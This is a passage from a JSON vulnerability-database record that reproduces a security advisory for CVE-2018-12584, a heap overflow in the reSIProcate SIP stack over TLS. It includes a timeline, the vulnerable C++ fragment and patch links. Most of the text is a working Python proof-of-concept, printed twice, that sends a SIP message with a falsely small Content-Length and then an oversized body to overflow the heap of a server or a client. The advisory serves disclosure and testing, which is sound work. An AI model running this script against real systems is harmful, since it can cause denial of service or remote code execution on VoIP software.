\nconnection.send(register_packet.encode()) \ncseq = cseq + 1 \nconnection.send(oversized_packet.encode()) \n \ndef trigger_client_heap_overflow(connection): \nglobal username, via, callid, cseq \nprint(\"Triggering heap overflow!\") \nbuffer_length = 100 \ncontent_length_packet = \"SIP/2.0 200 OK\\x0d\\x0aVia: SIP/2.0/TLS \n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom: \n<sip:\" + username + \"@\" + via + \n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via \n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2 \nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" % \nbuffer_length + \"\\x0d\\x0aSIP-ETag: \naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\" \noversized_packet = 
buffer_length * \"A\" + 64 * \"B\" \nconnection.send(content_length_packet.encode()) \ncseq = cseq + 1 \nconnection.send(oversized_packet.encode()) \nconnection.shutdown(SHUT_RDWR) \nconnection.close() \n \ndef test_clients(): \nglobal server_ip, keyfile, certfile \nserver_socket=socket(AF_INET, SOCK_STREAM) \nserver_socket.bind((server_ip, 5061)) \nserver_socket.listen(1) \ntls_server = wrap_socket(server_socket, \nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True, \nkeyfile=keyfile, certfile=certfile) \nprint(\"Server running!\") \ndone = False \nwhile not done: \nconnection, client_address= tls_server.accept() \nprint(\"Connection from \" + client_address[0] + \":%d\" % \nclient_address[1]) \ndata_in = connection.recv(1024) \nif not data_in: \ndone = True \nbreak \nmessage = data_in.decode() \nif \"SUBSCRIBE\" in message: \nprint(\"Client sent SUBSCRIBE request\") \ntrigger_client_heap_overflow(connection) \n \ndef test_server(): \nglobal server, port \ncontext = create_default_context() \ncontext.check_hostname = False \ncontext.verify_mode = CERT_NONE \ntls_client = context.wrap_socket(socket(AF_INET), server_hostname=server) \ntls_client.connect((server, port)) \nprint(\"Connected!\") \ntrigger_server_heap_overflow(tls_client) \ntls_client.shutdown(SHUT_RDWR) \ntls_client.close() \n \ndef main(): \nglobal daemon_mode \nif daemon_mode: \ntest_clients() \nelse: \ntest_server() \n \nif __name__ == \"__main__\": \nmain() \n \nEXPLOITABILITY \n \nAt http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html \nthe exploitability of an affected version of repro on Windows XP Professional \nwith Service Pack 3 was examined, it was separated from this text because AVG \nWeb Shield considered the text to be a threat. Arbitrary code execution has \nproven to be possible and may be possible on other operating systems and \nsoftware based on affected versions of reSIProcate as well. 
\n \nSOLUTION \n \nA patch was created by Scott Godin, it was committed to the reSIProcate \nrepository at \n \nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608 \n \nThe following software based on reSIProcate contains a fix for the issue: \n \n3CX Phone System 15.5.13470.6 and higher \n \nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in \nresiprocate package version 1:1.9.7-5+deb8u1 \n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html) \n \nDISCLAIMER \n \nThe information in this report is believed to be accurate at the time of \npublishing based on currently available information. \nUse of the information constitutes acceptance for use in an AS IS condition. \nThere are no warranties with regard to this information. Neither the author \nnor the publisher accepts any liability for any direct, indirect, or \nconsequential loss or damage arising from use of, or reliance on, this \ninformation. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148856/resiprocate-overflow.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-16T06:13:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-09T00:00:00", "type": "exploitdb", "title": "reSIProcate 1.10.2 - Heap Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-12584", "CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-09T00:00:00", "id": "EDB-ID:45174", "href": "https://www.exploit-db.com/exploits/45174", "sourceData": "'''\r\nCVE ID: CVE-2018-12584\r\n\r\nTIMELINE\r\n\r\n Bug report with test code sent to main reSIProcate developers: 2018-06-15\r\n Patch created by Scott Godin: 2018-06-18\r\n CVE ID assigned: 2018-06-19\r\n Patch committed to reSIProcate repository: 2018-06-21\r\n Advisory first published on website: 2018-06-22\r\n Advisory sent to Bugtraq mailing list: 2018-08-08\r\n\r\nDESCRIPTION\r\n\r\nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is\r\nenabled.\r\nAbuse of this vulnerability may cause a denial of service of software using\r\nreSIProcate and may also lead to remote code execution.\r\nNo SIP user authentication is required to trigger the vulnerability on the\r\nclient or server side.\r\n\r\nTECHNICAL DETAILS\r\n\r\nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following\r\ncode fragment:\r\n\r\nbool\r\nConnectionBase::preparseNewBytes(int bytesRead)\r\n{\r\n/* ... */\r\n else if (mBufferPos == mBufferSize)\r\n {\r\n // .bwc. We've filled our buffer; go ahead and make more room.\r\n size_t newSize = resipMin(mBufferSize*3/2, contentLength);\r\n char* newBuffer = 0;\r\n try\r\n {\r\n newBuffer=new char[newSize];\r\n }\r\n catch(std::bad_alloc&)\r\n {\r\n ErrLog(<<\"Failed to alloc a buffer while receiving body!\");\r\n return false;\r\n }\r\n memcpy(newBuffer, mBuffer, mBufferSize);\r\n mBufferSize=newSize;\r\n delete [] mBuffer;\r\n mBuffer = newBuffer;\r\n }\r\n/* ... 
*/\r\n}\r\n\r\nExecution of the code above could be triggered by sending a partial SIP\r\nmessage over TLS with a Content-Length header field, followed by sending a\r\npacket over TLS with its associated SIP message body. By setting the\r\nContent-Length field to a value that is lower than the length of the SIP\r\nmessage body which followed, a malicious user could trigger a heap buffer\r\noverflow.\r\n\r\nThe bug did not appear to be reproducible using TCP instead of TLS even when\r\nthe TCP packets were sent with delays between them.\r\n\r\nTEST CODE\r\n\r\nThe following Python script can be used to test the vulnerability of both\r\nserver and client software based on reSIProcate.\r\n'''\r\n\r\n#!/usr/bin/python3\r\n\r\n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code\r\n# Written by Joachim De Zutter (2018)\r\n\r\nfrom socket import *\r\nfrom ssl import * # pip install pyopenssl\r\n\r\ndaemon_mode = False\r\n\r\n# server to test (in case daemon_mode = False)\r\nserver = \"\"\r\nport = 5061\r\n\r\n# server configuration (in case daemon_mode = True)\r\nserver_ip = \"xxx.xxx.xxx.xxx\"\r\nkeyfile = \"keyfile.pem\"\r\ncertfile = \"certfile.pem\"\r\n\r\nusername = \"test\"\r\nvia = \"192.168.13.37:31337\"\r\ncallid = \"LtCwMvc2C5tca58a5Ridwg..\"\r\ncseq = 1\r\n\r\ndef trigger_server_heap_overflow(connection):\r\n global username, server, via, cseq\r\n print(\"Triggering heap overflow!\")\r\n buffer_length = 100\r\n register_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia:\r\nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via\r\n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server +\r\n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server +\r\n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires:\r\n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\"\r\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\r\n 
connection.send(register_packet.encode())\r\n cseq = cseq + 1\r\n connection.send(oversized_packet.encode())\r\n\r\ndef trigger_client_heap_overflow(connection):\r\n global username, via, callid, cseq\r\n print(\"Triggering heap overflow!\")\r\n buffer_length = 100\r\n content_length_packet = \"SIP/2.0 200 OK\\x0d\\x0aVia: SIP/2.0/TLS\r\n10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\\x0d\\x0aFrom:\r\n<sip:\" + username + \"@\" + via +\r\n\";transport=TLS>;tag=00649d4d\\x0d\\x0aTo: <sip:\" + username + \"@\" + via\r\n+ \";transport=TLS>\\x0d\\x0aCall-ID: \" + callid + \"\\x0d\\x0aCSeq: 2\r\nPUBLISH\\x0d\\x0aExpires: 600\\x0d\\x0aContent-Length: %ld\" %\r\nbuffer_length + \"\\x0d\\x0aSIP-ETag:\r\naf6079e42f65e7e2340e92565570e295\\x0d\\x0a\\x0d\\x0a\"\r\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\r\n connection.send(content_length_packet.encode())\r\n cseq = cseq + 1\r\n connection.send(oversized_packet.encode())\r\n connection.shutdown(SHUT_RDWR)\r\n connection.close()\r\n\r\ndef test_clients():\r\n global server_ip, keyfile, certfile\r\n server_socket=socket(AF_INET, SOCK_STREAM)\r\n server_socket.bind((server_ip, 5061))\r\n server_socket.listen(1)\r\n tls_server = wrap_socket(server_socket,\r\nssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True,\r\nkeyfile=keyfile, certfile=certfile)\r\n print(\"Server running!\")\r\n done = False\r\n while not done:\r\n connection, client_address= tls_server.accept()\r\n print(\"Connection from \" + client_address[0] + \":%d\" %\r\nclient_address[1])\r\n data_in = connection.recv(1024)\r\n if not data_in:\r\n done = True\r\n break\r\n message = data_in.decode()\r\n if \"SUBSCRIBE\" in message:\r\n print(\"Client sent SUBSCRIBE request\")\r\n trigger_client_heap_overflow(connection)\r\n\r\ndef test_server():\r\n global server, port\r\n context = create_default_context()\r\n context.check_hostname = False\r\n context.verify_mode = CERT_NONE\r\n tls_client = 
context.wrap_socket(socket(AF_INET), server_hostname=server)\r\n tls_client.connect((server, port))\r\n print(\"Connected!\")\r\n trigger_server_heap_overflow(tls_client)\r\n tls_client.shutdown(SHUT_RDWR)\r\n tls_client.close()\r\n\r\ndef main():\r\n global daemon_mode\r\n if daemon_mode:\r\n test_clients()\r\n else:\r\n test_server()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n'''\r\nEXPLOITABILITY\r\n\r\nAt http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html\r\nthe exploitability of an affected version of repro on Windows XP Professional\r\nwith Service Pack 3 was examined, it was separated from this text because AVG\r\nWeb Shield considered the text to be a threat. Arbitrary code execution has\r\nproven to be possible and may be possible on other operating systems and\r\nsoftware based on affected versions of reSIProcate as well.\r\n\r\nSOLUTION\r\n\r\nA patch was created by Scott Godin, it was committed to the reSIProcate\r\nrepository at\r\n\r\nhttps://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608\r\n\r\nThe following software based on reSIProcate contains a fix for the issue:\r\n\r\n3CX Phone System 15.5.13470.6 and higher\r\n\r\nFor Debian 8 \"Jessie\", CVE-2018-12584 and CVE-2017-11521 have been fixed in\r\nresiprocate package version 1:1.9.7-5+deb8u1\r\n(https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)\r\n\r\nDISCLAIMER\r\n\r\nThe information in this report is believed to be accurate at the time of\r\npublishing based on currently available information.\r\nUse of the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. 
Neither the author\r\nnor the publisher accepts any liability for any direct, indirect, or\r\nconsequential loss or damage arising from use of, or reliance on, this\r\ninformation.\r\n'''", "sourceHref": "https://www.exploit-db.com/download/45174", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}